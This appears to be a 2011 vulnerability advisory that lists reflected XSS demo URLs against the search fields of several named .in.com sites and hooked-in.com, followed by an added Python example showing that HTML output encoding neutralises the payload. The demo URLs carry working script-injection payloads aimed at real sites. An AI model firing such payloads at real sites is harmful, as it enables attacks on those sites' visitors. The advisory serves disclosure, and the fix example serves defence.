%+ $.......#........4.........|)........0............\/\/ %+

# Exploit Title: *.in.com XSS vulnerability
# Vendor: various
# Date: 6th July, 2011
# Author: r007k17 a.k.a Raghavendra Karthik D
# Link: http://shadowrootkit.wordpress.com/
# Google Dork: © Copyright 2010, Business.in.com

************************************************************

{DEMO} : http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E
EXPLOIT: ">

{DEMO} : http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E
EXPLOIT: ">

{DEMO} : http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E
EXPLOIT: ">

Reflected XSS in connect.in.com

Inject the EXPLOIT below in the search field at http://connect.in.com and observe a pop-up saying r007k17.

{DEMO} : http://connect.in.com
EXPLOIT: ">

************************************************************

sp3c14l Thanks to s1d3^effects and my friends@!3.14--
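For the site owner's side of the demos above, the following added example (not part of the original advisory or of any affected site's code) decodes the search parameter from each demo URL and renders it into a search box with and without output encoding. The template and all function names are assumptions; the advisory does not show the pages' markup, and the double-quoted `value` attribute is inferred from the `">` prefix of the payload.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl

# Demo URLs copied from the advisory above.
DEMO_URLS = [
    "http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E",
    "http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E",
    "http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E",
]

# Constructed template (assumption): the search term is echoed back
# inside a double-quoted attribute of the search box.
TEMPLATE = '<input type="text" name="q" value="{term}">'


def search_terms(url):
    """Return the percent-decoded (name, value) query pairs of a URL."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def render_unsafe(term):
    """Reflect the term verbatim, as the affected pages appear to do."""
    return TEMPLATE.format(term=term)


def render_escaped(term):
    """Reflect the term with HTML attribute encoding applied first."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


class TagCollector(HTMLParser):
    """Records every element start tag the parser sees."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    """List the elements a parser finds in the rendered markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    for url in DEMO_URLS:
        for name, value in search_terms(url):
            print(name, tags_in(render_unsafe(value)), tags_in(render_escaped(value)))
```

Encoding `"`, `<` and `>` at output time keeps the reflected term inside the attribute, so the parser sees only the one `input` element.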